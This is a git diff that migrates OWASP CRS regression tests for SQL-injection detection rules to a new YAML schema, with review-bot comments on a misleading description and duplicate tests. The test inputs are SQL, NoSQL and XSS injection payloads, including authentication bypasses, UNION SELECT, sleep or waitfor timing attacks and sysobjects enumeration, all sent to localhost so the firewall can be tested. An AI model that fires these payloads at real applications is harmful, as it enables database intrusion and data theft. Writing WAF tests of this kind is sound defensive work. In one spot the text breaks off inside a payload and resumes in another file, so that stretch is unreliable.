stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=I%20sleep%20well%21" - version: HTTP/1.0 - output: - no_log_contains: id "942170" - - test_title: 942170-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942170] + - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=select+if(x" - version: HTTP/1.0 - output: - log_contains: id "942170" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=select+if(x" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index b467c61d0..8b96a08c5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml 
@@ -1,137 +1,135 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942180.yaml +rule_id: 942180 tests: - - test_title: 942180-1 + - test_id: 1 desc: "basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/get?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - test_title: 942180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/get?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942180] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" - version: HTTP/1.0 - output: - log_contains: id "942251" - - test_title: 942251-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
method: GET + port: 80 + uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log: + expect_ids: [942251] + - test_id: 2 desc: "Detects having injections negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=having%20fun" - version: HTTP/1.0 - output: - no_log_contains: id "942251" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=having%20fun" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942251] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index 08d6b996f..82641f3a8 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml 
@@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, Christian Folini, azurit" - description: None - enabled: true - name: 942260.yaml +rule_id: 942260 tests: - - test_title: 942260-1 + - test_id: 1 desc: "Basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something LIKE ' - uri: "/get?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/get?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942260] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 812a06146..0afc59e87 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml 
@@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942270.yaml +rule_id: 942270 tests: - - test_title: 942270-1 + - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" - - test_title: 942270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942270] + - test_id: 2 desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=Xunionselectfrom" - version: HTTP/1.0 - output: - log_contains: id "942270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log: + expect_ids: [942270] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 7608a7f2d..07d1d74fb 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942280.yaml +rule_id: 942280 tests: - - test_title: 942280-1 + - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" - - test_title: 942280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log: + expect_ids: [942280] + - test_id: 2 desc: "SQL Server waitfor delay attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942280" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942280] 
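Review bot: The desc of test 1, `"Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts"`, restates the whole rule's scope while its stage only sends `select pg_sleep`; test 2 covers the `waitfor delay` case, and nothing in the file exercises the shutdown variant the desc names. Either narrow the desc to what the stage actually checks, `desc: "Postgres pg_sleep injection"`, or add a third test for the shutdown case so the regression coverage matches the description. With `expect_ids` now asserting an exact rule id per stage, a reader relying on the desc would otherwise assume coverage that is not there.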
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index 82f810d9a..bac70548f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml 
@@ -1,161 +1,159 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 942290.yaml +rule_id: 942290 tests: - - test_title: 942290-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$ne]=2" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$ne]=2" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 2 desc: "basic MongoDB NOSQL injection attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 3 desc: "basic MongoDB NOSQL injection attempts 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 4 desc: "basic MongoDB NOSQL injection attempts 3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 5 desc: "basic MongoDB NOSQL injection attempts 4" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$not": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$not": "foo"}' + version: "HTTP/1.1" + 
output: + log: + expect_ids: [942290] + - test_id: 6 desc: "basic MongoDB NOSQL injection attempts 5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$nor": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$nor": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 7 desc: "basic MongoDB NOSQL injection attempts 6" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$where": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$where": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 8 desc: "basic MongoDB NOSQL injection attempts 7" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$elemMatch": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$elemMatch": "foo"}' + version: 
"HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 9 desc: "basic MongoDB NOSQL injection attempts 8" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$text": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$text": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f6a801990..4d19c2760 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml 
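Review bot: Tests 3 and 4 (`test_id: 3` and `test_id: 4`) send the identical request, `uri: "/get/mongo/show.php?u_id[$regex]=2"` with the same headers and version, so the second one adds no coverage and only repeats the same case. Since the migration rewrites every stage anyway, this is the moment to drop one of them or point it at a different operator, the way the JSON-body tests 5 to 9 each use a distinct `$`-keyword. 942300.yaml has the same problem: its tests 1 and 2 both post `data: "var=) when 234 then&foo=bar"` under the same desc. Test ids are explicit now, so I would expect a gap in the numbering to be tolerated, but that is worth confirming against go-ftw before deciding whether to renumber. A smaller style point in this hunk: `dest_addr` and `version` are quoted in tests 1 and 5 to 9 and unquoted in tests 2 to 4, which is harmless but worth normalising while every line is being touched.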
@@ -1,58 +1,56 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942300.yaml +rule_id: 942300 tests: - - test_title: 942300-1 + - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942300] + - test_id: 2 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942300] + - test_id: 3 desc: "No false positives with for. 
Issue #2007" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=booked%20for%202021%28including%202020" - version: HTTP/1.0 - output: - no_log_contains: id "942300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942300] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 1e34f1e4f..e198085a0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml 
@@ -1,63 +1,61 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942310.yaml +rule_id: 942310 tests: - - test_title: 942310-1 + - test_id: 1 desc: | Chained SQL injection attempts 2/2. This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). This test now checks that no match occurs for something that would have matched the original expression. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - no_log_contains: id "942310" - - test_title: 942310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942310] + - test_id: 2 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" - version: HTTP/1.0 - output: - log_contains: id "942310" - - test_title: 942310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] + - test_id: 3 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" - version: HTTP/1.0 - output: - log_contains: id "942310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 94b3ae37f..59c8ca3dd 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml 
@@ -1,219 +1,217 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None - enabled: true - name: 942320.yaml +rule_id: 942320 tests: - - test_title: 942320-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=exec+%28%40%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 3 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=declare+%40b%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 4 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 5 desc: "Detects PostgreSQL data conversion with ::int" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=password::int" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
